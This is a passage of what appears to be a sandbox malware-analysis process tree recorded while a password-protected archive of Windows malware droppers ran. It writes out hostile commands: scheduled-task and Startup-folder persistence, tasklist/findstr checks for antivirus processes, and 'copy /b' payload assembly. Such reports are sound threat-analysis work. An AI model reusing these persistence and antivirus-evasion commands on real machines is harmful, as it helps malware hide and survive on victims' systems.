    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe"
    3⤵
    - Executes dropped EXE
    PID:1772
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6472
  - - C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
      "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5780
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6656
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:6872
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
      4⤵
      Enumerates connected drives
      System Location Discovery: System Language Discovery
      PID:6624
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"
    3⤵
    PID:5424
  - - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe
      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"
      4⤵
      PID:4176
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"
    3⤵
    PID:3768
  - - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe
      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"
      4⤵
      PID:648
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe"
    3⤵
    PID:5188
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe"
    3⤵
    PID:2836
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe"
    3⤵
    PID:5836
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe"
    3⤵
    PID:5476
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe"
    3⤵
    PID:6192
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe"
    3⤵
    PID:1556
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe"
    3⤵
    PID:5700
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      PID:3248
  - - C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe"
      4⤵
      PID:1368
  - - C:\Windows\system32\audiodg.exe
      "C:\Windows\system32\audiodg.exe"
      4⤵
      PID:6000
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"
    3⤵
    PID:6636
  - - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe
      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"
      4⤵
      PID:3572
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe"
    3⤵
    PID:7144
  - - C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
      4⤵
      PID:7068
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe"
    3⤵
    PID:4488
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe"
    3⤵
    PID:4320
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe"
    3⤵
    PID:7176
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe"
    3⤵
    PID:7896
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe"
    3⤵
    PID:7364
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe"
    3⤵
    PID:3100
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe"
    3⤵
    PID:7048
- C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3496
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3828
  - - C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp" /SL5="$10446,3312183,56832,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1284
    - - C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
        
        "C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe" -i
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2944
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4760
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4488
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2148
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4604
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3148
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1876
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2648
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4368
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        
        PID:4532
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 33988
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3452
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer
        5⤵
        
        PID:4608
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral w
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2880
    - - C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com
        
        Paintball.com w
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4020
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3588
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
    3⤵
    - Executes dropped EXE
    PID:2788
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2624
  - - C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6032
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5428
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6196
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
      4⤵
      System Location Discovery: System Language Discovery
      PID:7128
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:6520
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6540
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:6132
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4776
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 812297
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6840
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "IndieBeachesHonIo" Janet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5984
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6232
    - - C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
        
        812297\Shopzilla.pif 812297\g
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:6408
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:6376
      - C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
        
        C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:6292
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 15
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:6496
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5604
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3172
    - - C:\Users\Admin\AppData\Local\Temp\3076928777.exe
        
        C:\Users\Admin\AppData\Local\Temp\3076928777.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1780
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6492
    - - C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe
        
        "C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        System policy modification
        
        PID:6660
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6324
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx
    PID:4904
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2136
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    PID:6368
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Executes dropped EXE
      PID:4988
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3484
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2136
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exit
  2⤵
  - Drops startup file
  PID:5088
- C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
  "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:5272
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5360
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8
    3⤵
    PID:5376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
    3⤵
    PID:5564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
    3⤵
    PID:5596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
    3⤵
    PID:5652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
    3⤵
    PID:5664
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
    3⤵
    PID:2992
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
    3⤵
    PID:5008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
    3⤵
    PID:5176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
    3⤵
    PID:5964
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
    3⤵
    PID:5972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:8
    3⤵
    PID:1760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
    3⤵
    PID:5192
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
